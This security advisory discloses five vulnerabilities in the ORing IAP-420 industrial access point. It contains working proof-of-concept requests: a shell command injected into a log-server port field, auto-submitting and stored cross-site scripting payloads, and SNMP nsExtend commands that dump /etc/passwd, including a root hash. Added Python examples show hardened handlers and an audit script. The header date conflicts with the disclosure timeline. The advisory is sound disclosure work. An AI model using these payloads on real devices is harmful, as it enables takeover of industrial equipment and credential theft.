Date
24/05/2024
Impact
High
CVE IDs
CVE-2024-55544
CVE-2024-55545
CVE-2024-55546
CVE-2024-55547
CVE-2024-55548

St. Pölten UAS | Multiple Vulnerabilities in ORing IAP

The ORing IAP-420 is affected by multiple vulnerabilities: an authenticated command injection, a reflected and a stored cross-site scripting, remote command execution via SNMP and a denial of service. Together they allow an attacker to gain full control of the device, compromise user sessions, execute arbitrary commands or disrupt device functionality.

Vendor description

„Founded in 2005, ORing specializes in developing innovative own-branded products for industrial settings. Over the years, ORing has accumulated abundant experience in wired and wireless network communications industry. In line with the commercialization of 5G, ORing has stretched its arm into the IIoT field, helping customers realize all kinds of IIoT applications such as smart manufacturing, smart city, and industrial automation. With high product quality and best customer services in mind, ORing has continued to launch cutting-edge products catering to customer needs. ORing’s products have been widely adopted in surveillance, rail transport, industrial automation, power substations, renewable energy, and marine industries with offices worldwide to address customer needs in real time.“

Source: https://oringnet.com/en/about-us/company-profile

Vulnerable versions

IAP-420 / 2.01e

Vulnerability overview

1) Authenticated Command Injection (CVE-2024-55544)

A command injection vulnerability was identified in the web server. It can only be exploited by a user who is authenticated to the web interface. An attacker can use it to invoke arbitrary operating system commands and thereby gain full control over the device.

2) Reflected Cross-Site Scripting (CVE-2024-55545)

A reflected cross-site scripting vulnerability is present on the sub page “even_log.cgi”, which is used to display event logs. It can be exploited in the context of a victim’s session.

3) Stored Cross-Site Scripting (CVE-2024-55546)

A stored cross-site scripting vulnerability has been identified in the firmware of the device. It was identified in the device properties and can be exploited in the context of a victim’s session.

4) Remote Command Execution via SNMP (CVE-2024-55547)

The SNMP agent allows writing to the nsExtendObjects of NET-SNMP-EXTEND-MIB. An attacker with write access to the agent (the proof of concept uses the community string “public”) can register and execute arbitrary commands on the operating system of the device.

5) Denial of Service (CVE-2024-55548)

A denial of service (DoS) condition is reached when a password of more than 16 characters is set for a user account. This requires an authenticated user and is possible because the length limit is only enforced client-side: disabling the length check on the input field is enough to submit the longer password.

Proof of Concept

1) Authenticated Command Injection (CVE-2024-55544)

The following POST request creates a file named “test” in the “/tmp” directory by injecting a shell command into the “tf_logserver_port” parameter.

POST /cgi-bin/even_log.cgi HTTP/1.1
Host: 10.69.10.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 553
Origin: http://10.69.10.2
Connection: keep-alive
Referer: http://10.69.10.2/cgi-bin/even_log.cgi
Cookie: <auth-cookie>
Upgrade-Insecure-Requests: 1

tf_logserver_ip=10.10.10.0&tf_logserver_port=;touch%20/tmp/test&Submit=Apply&
ret_msg=&lang=en&h_ColdLog=off&h_WarmLog=off&h_AuthLog=off&h_IpLog=off&
h_PwdLog=off&h_RedundantPowerLog=&h_LinkChangedLog=off&
h_SNMPAccessFailedLog=off&h_WlcAssociatedLog=off&h_WlcDisassociatedLog=off&
h_CliAssociatedLog=off&h_CliDisassociatedLog=off&h_CliRoamingLog=off&
h_Power1FaultLog=&h_Power2FaultLog=&h_POEFaultLog=&h_Eth1LinkDownLog=off&
h_Eth2LinkDownLog=off&h_DI1LtoHLog=&h_DI2LtoHLog=&h_DI3LtoHLog=&h_DI4LtoHLog=&
h_DI1HtoLLog=&h_DI2HtoLLog=&h_DI3HtoLLog=&h_DI4HtoLLog=

This way, the file “/tmp/test” gets created on the filesystem.
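The request above shows the effect but not the bug class. The following is an added example (not the device's firmware, whose source the advisory does not include): a model of a handler that splices the user-supplied syslog target into a shell command line, next to a hardened version. The command template, the use of `echo` as a harmless stand-in for the real daemon invocation, and the validation rules are assumptions; only the form field names and the payload are taken from the request body above.

```python
"""Model of the bug class behind CVE-2024-55544 (added example, not the
device's firmware): a handler that splices the user-supplied syslog target
into a shell command line, next to a hardened version.  The command
template, `echo` as stand-in for the real daemon invocation, and the
validation rules are assumptions; the field names and the payload come
from the advisory's request body."""
from __future__ import annotations

import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# Relevant part of the advisory's PoC body (constructed excerpt).
POC_BODY = "tf_logserver_ip=10.10.10.0&tf_logserver_port=;touch%20/tmp/test&Submit=Apply"


def parse_form(body: str) -> dict[str, str]:
    """Split a urlencoded body on '&' only, as the CGI does; the ';' stays
    inside the value and reaches the shell untouched."""
    fields: dict[str, str] = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def vulnerable_configure(ip: str, port: str, command: str = "echo") -> list[str]:
    """Vulnerable pattern: string interpolation plus `sh -c` (what system() does).
    A ';' in `port` terminates the intended command and starts a new one."""
    cmdline = f"{command} {ip}:{port}"
    result = subprocess.run(["/bin/sh", "-c", cmdline], capture_output=True, text=True)
    return result.stdout.splitlines()


PORT_RE = re.compile(r"[0-9]{1,5}")


def validate_target(ip: str, port: str) -> tuple[str, int]:
    """Allow-list validation: the IP must parse as an address literal and the
    port must be a decimal number in 1..65535.  Raises ValueError otherwise."""
    addr = ipaddress.ip_address(ip)
    if not PORT_RE.fullmatch(port) or not 1 <= int(port) <= 65535:
        raise ValueError(f"invalid log server port: {port!r}")
    return str(addr), int(port)


def is_valid_target(ip: str, port: str) -> bool:
    try:
        validate_target(ip, port)
        return True
    except ValueError:
        return False


def hardened_configure(ip: str, port: str, command: str = "echo") -> list[str]:
    """Hardened pattern: validated values passed as an argv list with no shell,
    so an unexpected character could only ever become a literal argument."""
    addr, num = validate_target(ip, port)
    result = subprocess.run([command, f"{addr}:{num}"], capture_output=True, text=True)
    return result.stdout.splitlines()


if __name__ == "__main__":
    fields = parse_form(POC_BODY)
    ip, port = fields["tf_logserver_ip"], fields["tf_logserver_port"]
    print("decoded port field:", repr(port))
    # A harmless payload in place of the advisory's `touch`, to show the split.
    print("vulnerable handler output:", vulnerable_configure(ip, ";echo INJECTED"))
    print("hardened handler accepts PoC input?", is_valid_target(ip, port))
```

The vulnerable handler prints two lines for the injected input because `sh -c` treats the `;` as a command separator; the hardened one rejects the same input before anything is executed, and even a value that passed validation would reach the command as a single argv element.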

2) Reflected Cross-Site Scripting (CVE-2024-55545)

The following payload triggers the cross-site scripting:
"><script >alert(document.cookie)</script >
This has been implemented as an HTML file as a simple proof of concept, which submits the payload in the “tf_logserver_ip” parameter of “even_log.cgi” as soon as the page is opened:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>XSS PoC</title>
</head>
<body>
<h1>XSS Proof of Concept</h1>
<form id="xssForm" action="http://10.69.10.2/cgi-bin/even_log.cgi" method="POST">
<input type="hidden" name="tf_logserver_ip" value="&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;">
<input type="hidden" name="tf_logserver_port" value="66">
<input type="hidden" name="Submit" value="Apply">
<input type="hidden" name="ret_msg" value="">
<input type="hidden" name="lang" value="en">
<input type="hidden" name="h_ColdLog" value="off">
<input type="hidden" name="h_WarmLog" value="off">
<input type="hidden" name="h_AuthLog" value="off">
<input type="hidden" name="h_IpLog" value="off">
<input type="hidden" name="h_PwdLog" value="off">
<input type="hidden" name="h_LinkChangedLog" value="off">
<input type="hidden" name="h_SNMPAccessFailedLog" value="off">
<input type="hidden" name="h_WlcAssociatedLog" value="off">
<input type="hidden" name="h_WlcDisassociatedLog" value="off">
<input type="hidden" name="h_CliAssociatedLog" value="off">
<input type="hidden" name="h_CliDisassociatedLog" value="off">
<input type="hidden" name="h_CliRoamingLog" value="off">
<input type="hidden" name="h_Eth1LinkDownLog" value="off">
<input type="hidden" name="h_Eth2LinkDownLog" value="off">
</form>
<script>
document.getElementById('xssForm').submit();
</script>
</body>
</html>

3) Stored Cross-Site Scripting (CVE-2024-55546)

Persistent JavaScript can be stored on the device by abusing the system settings. In the request below the payload is split across the device name, location and description fields; the JavaScript comment markers join the three fragments into a single script once the page renders them:
POST /cgi-bin/basic_sysset.cgi HTTP/1.1
Host: 10.69.10.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
Origin: http://10.69.10.3
Connection: keep-alive
Referer: http://10.69.10.3/cgi-bin/basic_sysset.cgi?lang=en
Cookie: auth=YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
tf_devname=%3Cscript%3E%2F*&tf_devlocation=*%2Falert%281%29%3B%2F*&tf_devdes=*%2F%3C%2Fscript%3E&bt_apply=Apply&lang=en&ret_msg=
Every time the sub page is loaded, the stored JavaScript is executed.

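The two cross-site scripting findings share one root cause: user input written into HTML without output encoding. The following is an added example (not the device's firmware) that decodes the stored-XSS body above, renders the three device-property fields through a hypothetical properties table with and without escaping, and does the same for the reflected payload through a hypothetical input field. The two page templates are assumptions; the request body and the payload are the ones from the proofs of concept.

```python
"""Added example (not the device's firmware): decode the stored-XSS body from
the advisory and show how writing the three device-property fields into HTML
without escaping turns the fragments into one executable script, beside an
escaped rendering.  TABLE_TEMPLATE and INPUT_TEMPLATE stand in for the
device's pages and are assumptions; the body and the reflected payload are
taken from the advisory's PoCs."""
from __future__ import annotations

import re
from html import escape
from urllib.parse import unquote_plus

# Body of the advisory's basic_sysset.cgi request (constructed excerpt).
STORED_BODY = ("tf_devname=%3Cscript%3E%2F*&tf_devlocation=*%2Falert%281%29%3B%2F*"
               "&tf_devdes=*%2F%3C%2Fscript%3E&bt_apply=Apply&lang=en&ret_msg=")
# Payload of the even_log.cgi reflected-XSS PoC.
REFLECTED_PAYLOAD = '"><script>alert(document.cookie)</script>'

# Hypothetical page fragments: a properties table and the log-server input.
TABLE_TEMPLATE = ("<tr><td>Device Name</td><td>{name}</td></tr>"
                  "<tr><td>Location</td><td>{location}</td></tr>"
                  "<tr><td>Description</td><td>{description}</td></tr>")
INPUT_TEMPLATE = '<input type="text" name="tf_logserver_ip" value="{value}">'


def decode_form(body: str) -> dict[str, str]:
    """URL-decode a form body into a field dict (split on '&' only)."""
    fields: dict[str, str] = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def render_properties(fields: dict[str, str], escaped: bool) -> str:
    """Render the three stored fields; `escaped=False` is the vulnerable path."""
    enc = escape if escaped else (lambda s: s)
    return TABLE_TEMPLATE.format(name=enc(fields["tf_devname"]),
                                 location=enc(fields["tf_devlocation"]),
                                 description=enc(fields["tf_devdes"]))


def render_input(value: str, escaped: bool) -> str:
    """Reflect a submitted value into an attribute; escape() also encodes '"',
    which is what stops the payload from closing the value attribute."""
    return INPUT_TEMPLATE.format(value=escape(value, quote=True) if escaped else value)


def executed_script(html: str) -> str | None:
    """Approximate what the browser runs: the first <script> body with
    /* ... */ comments removed (the comments swallow the HTML between fields)."""
    m = re.search(r"<script>(.*?)</script>", html, re.S)
    if not m:
        return None
    return re.sub(r"/\*.*?\*/", "", m.group(1), flags=re.S).strip()


if __name__ == "__main__":
    fields = decode_form(STORED_BODY)
    for key in ("tf_devname", "tf_devlocation", "tf_devdes"):
        print(f"{key:16} = {fields[key]!r}")
    print("stored, unescaped  ->", executed_script(render_properties(fields, escaped=False)))
    print("stored, escaped    ->", executed_script(render_properties(fields, escaped=True)))
    print("reflected, unescaped ->", executed_script(render_input(REFLECTED_PAYLOAD, escaped=False)))
    print("reflected, escaped   ->", executed_script(render_input(REFLECTED_PAYLOAD, escaped=True)))
```

The split payload matters for the stored case: each field on its own is not a complete script, which is why a per-field check would not catch it, but the `/* ... */` comments turn the table markup between the fields into dead code and the browser executes `alert(1);`. Context-aware output encoding at render time neutralises both payloads regardless of how they were stored.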
4) Remote Command Execution via SNMP (CVE-2024-55547)

Setting the SNMP nsExtendObjects can be done with the command “snmpset”:

$ snmpset -m +NET-SNMP-EXTEND-MIB -v2c -c public 10.69.10.3 'nsExtendStatus."evilcommand"' = createAndGo 'nsExtendCommand."evilcommand"' = /bin/cat 'nsExtendArgs."evilcommand"' = '/etc/passwd' 
NET-SNMP-EXTEND-MIB::nsExtendStatus."evilcommand" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."evilcommand" = STRING: /bin/cat
NET-SNMP-EXTEND-MIB::nsExtendArgs."evilcommand" = STRING: /etc/passwd
The placed command “/bin/cat” is executed by reading the objects back with “snmpwalk”: the entry has run type run-on-read, so every read of its output objects invokes the command and returns its output:
$ snmpwalk -v2c -c public 10.69.10.3 NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."evilcommand" = STRING: /bin/cat
NET-SNMP-EXTEND-MIB::nsExtendArgs."evilcommand" = STRING: /etc/passwd
NET-SNMP-EXTEND-MIB::nsExtendInput."evilcommand" = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."evilcommand" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."evilcommand" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."evilcommand" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."evilcommand" = INTEGER: volatile(2)
NET-SNMP-EXTEND-MIB::nsExtendStatus."evilcommand" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."evilcommand" = STRING: root:k6GmNCQYU9ZQU:0:0:Adminstrator:/:/bin/sh
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."evilcommand" = STRING: root:k6GmNCQYU9ZQU:0:0:Adminstrator:/:/bin/sh
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."evilcommand" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."evilcommand" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."evilcommand".1 = STRING: root:k6GmNCQYU9ZQU:0:0:Adminstrator:/:/bin/sh
In this case, the contents of “/etc/passwd” are returned.

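An operator who cannot patch the device can at least look for such entries. The following is an added example (not part of the advisory): it parses `snmpwalk` output for NET-SNMP-EXTEND-MIB into per-entry records and flags every extension that is not on an allow-list, and it builds the audit command so that enumeration does not itself execute the commands. The sample output is the walk shown above, embedded verbatim; the allow-list and the field names of the findings are assumptions.

```python
"""Added example (not part of the advisory): audit a net-snmp agent for
nsExtend entries of the kind planted above.  SAMPLE_WALK is the snmpwalk
output from the advisory; the allow-list and the finding layout are
assumptions."""
from __future__ import annotations

import re

SAMPLE_WALK = """\
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."evilcommand" = STRING: /bin/cat
NET-SNMP-EXTEND-MIB::nsExtendArgs."evilcommand" = STRING: /etc/passwd
NET-SNMP-EXTEND-MIB::nsExtendInput."evilcommand" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."evilcommand" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."evilcommand" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."evilcommand" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."evilcommand" = INTEGER: volatile(2)
NET-SNMP-EXTEND-MIB::nsExtendStatus."evilcommand" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."evilcommand" = STRING: root:k6GmNCQYU9ZQU:0:0:Adminstrator:/:/bin/sh
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."evilcommand" = STRING: root:k6GmNCQYU9ZQU:0:0:Adminstrator:/:/bin/sh
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."evilcommand" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."evilcommand" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."evilcommand".1 = STRING: root:k6GmNCQYU9ZQU:0:0:Adminstrator:/:/bin/sh
"""

# <object>."<entry name>"[.<line index>] = <TYPE>: <value>
LINE_RE = re.compile(
    r'^NET-SNMP-EXTEND-MIB::(\w+)\."([^"]*)"(?:\.(\d+))?\s*=\s*(\w+):\s?(.*)$')


def parse_extend_walk(text: str) -> dict[str, dict]:
    """Group the walk by extension name; nsExtendOutLine rows are collected
    into a list, every other object becomes a key of the entry."""
    entries: dict[str, dict] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if not m:  # scalars such as nsExtendNumEntries.0 carry no entry name
            continue
        obj, name, _idx, _type, value = m.groups()
        entry = entries.setdefault(name, {"nsExtendOutLine": []})
        if obj == "nsExtendOutLine":
            entry["nsExtendOutLine"].append(value)
        else:
            entry[obj] = value
    return entries


def audit_extensions(entries: dict[str, dict], allowed: frozenset[str] = frozenset()) -> list[dict]:
    """Every extension not explicitly allowed is a finding; an active entry with
    run type run-on-read executes on each read of its output objects."""
    findings = []
    for name, e in entries.items():
        if name in allowed:
            continue
        findings.append({
            "name": name,
            "command": e.get("nsExtendCommand", ""),
            "args": e.get("nsExtendArgs", ""),
            "active": e.get("nsExtendStatus", "").startswith("active"),
            "run_on_read": e.get("nsExtendRunType", "").startswith("run-on-read"),
            "storage": e.get("nsExtendStorage", ""),
        })
    return findings


def audit_cmd(host: str, community: str) -> list[str]:
    """Enumerate extensions without running them: walk only the config table,
    not nsExtendObjects, whose output tables trigger run-on-read commands."""
    return ["snmpwalk", "-v2c", "-c", community, host,
            "NET-SNMP-EXTEND-MIB::nsExtendConfigTable"]


if __name__ == "__main__":
    for f in audit_extensions(parse_extend_walk(SAMPLE_WALK)):
        print(f)
    print(" ".join(audit_cmd("10.69.10.3", "public")))
```

Two caveats follow from the walk above: reading the output objects is what executes the command, so an audit should walk nsExtendConfigTable rather than the whole nsExtendObjects subtree, and the entry shown is stored as volatile(2), so a reboot removes it but the attacker can re-create it with the same `snmpset` at any time.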
5) Denial of Service (CVE-2024-55548)

Disabling the length check of the input field makes it possible to set a password longer than 16 characters. Doing so puts the device into a DoS state: its web interface is no longer usable.

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

None.

Workaround

Restrict network access to the device, in particular to the web management interface and to SNMP.

Recommendation

CyberDanube recommends replacing the hardware.


Contact Timeline

  • 2024-09-23: Contacting ORing via support@oringnet.com and sending advisory to support.
  • 2024-10-21: Asking for an update; No answer.
  • 2024-10-30: Asking for an update; No answer.
  • 2024-11-11: Asking for an update; No answer.
  • 2024-12-04: Asking for an update; No answer.
  • 2024-12-06: Informing ORing that the publication will be done on 2024-12-09.
  • 2024-12-09: Release of security advisory.

Author(s)

UAS St. Pölten

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture given by CyberDanube at UAS St. Pölten, students discovered these vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube and the MEDUSA solution.